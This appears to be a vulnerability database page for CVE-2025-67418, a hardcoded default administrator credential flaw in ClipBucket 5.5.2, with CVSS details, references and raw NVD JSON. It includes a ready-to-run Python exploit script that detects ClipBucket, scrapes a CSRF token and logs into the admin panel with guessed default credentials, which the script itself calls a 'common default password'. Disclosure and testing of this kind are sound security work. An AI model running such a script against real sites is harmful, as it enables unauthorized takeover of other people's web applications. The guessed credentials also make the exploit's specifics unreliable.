CVE-2025-67418

Description

ClipBucket 5.5.2 is affected by an improper access control issue where the product is shipped or deployed with hardcoded default administrative credentials. An unauthenticated remote attacker can log in to the administrative panel using these default credentials, resulting in full administrative control of the application.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE

ClipBucket 5.5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-67418 ClipBucket Default Credentials Exploit
This PoC demonstrates the hardcoded credential vulnerability in ClipBucket 5.5.2
"""
import requests
import sys
from bs4 import BeautifulSoup

TARGET = "http://target-website.com"  # Replace with target URL
ADMIN_PATH = "/admin/"
LOGIN_PATH = "/login/"

# Default credentials for ClipBucket 5.5.2 (from public sources)
DEFAULT_CREDS = {
    "username": "admin",
    "password": "admin123"  # Common default password
}

def check_vulnerability():
    """Check if target is vulnerable"""
    print(f"[*] Checking if {TARGET} is running ClipBucket 5.5.2...")
    
    # Check for ClipBucket signature
    response = requests.get(TARGET, timeout=10)
    if 'clipbucket' in response.text.lower() or 'cb_def' in response.text:
        print("[+] ClipBucket detected!")
        return True
    
    # Check admin path
    admin_response = requests.get(TARGET + ADMIN_PATH, timeout=10)
    if admin_response.status_code == 200:
        print("[+] Admin path accessible!")
        return True
    
    return False

def exploit():
    """Attempt to login with default credentials"""
    print("[*] Attempting login with default credentials...")
    
    session = requests.Session()
    
    # Get login page to extract CSRF token if needed
    login_url = TARGET + LOGIN_PATH
    response = session.get(login_url, timeout=10)
    
    # Prepare login data
    login_data = {
        "username": DEFAULT_CREDS["username"],
        "password": DEFAULT_CREDS["password"],
        "submit": "Login"
    }
    
    # Add CSRF token if present
    soup = BeautifulSoup(response.text, 'html.parser')
    csrf_input = soup.find('input', {'name': 'csrf_token'})
    if csrf_input:
        login_data['csrf_token'] = csrf_input.get('value', '')
    
    # Attempt login
    post_response = session.post(login_url, data=login_data, allow_redirects=True)
    
    # Check if login successful
    if 'admin' in post_response.url or 'dashboard' in post_response.url:
        print("[+] SUCCESS! Logged in with default credentials!")
        print(f"[+] Access granted to: {post_response.url}")
        return session
    else:
        print("[-] Login failed with default credentials")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET = sys.argv[1]
    
    if check_vulnerability():
        session = exploit()
        if session:
            print("[!] VULNERABLE - Default credentials are active!")
            print("[!] Immediate action required: Change admin password!")
    else:
        print("[-] Target does not appear to be vulnerable")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67418
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67418
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67418/
[4] VulDB https://vuldb.com/cve/CVE-2025-67418
[5] http://clipbucket.com
[6] https://medium.com/@arpit03sharma2003/cve-2025-67418-when-default-credentials-become-a-remote-root-button-03be5ee4b927

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67418", "sourceIdentifier": "[email protected]", "published": "2025-12-22T20:15:45.303", "lastModified": "2026-01-02T17:39:50.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket 5.5.2 is affected by an improper access control issue where the product is shipped or deployed with hardcoded default administrative credentials. An unauthenticated remote attacker can log in to the administrative panel using these default credentials, resulting in full administrative control of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndIncluding": "5.5.2", "matchCriteriaId": "15859994-9C26-499F-9707-66E2040BBC82"}]}]}], "references": [{"url": "http://clipbucket.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://medium.com/@arpit03sharma2003/cve-2025-67418-when-default-credentials-become-a-remote-root-button-03be5ee4b927", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}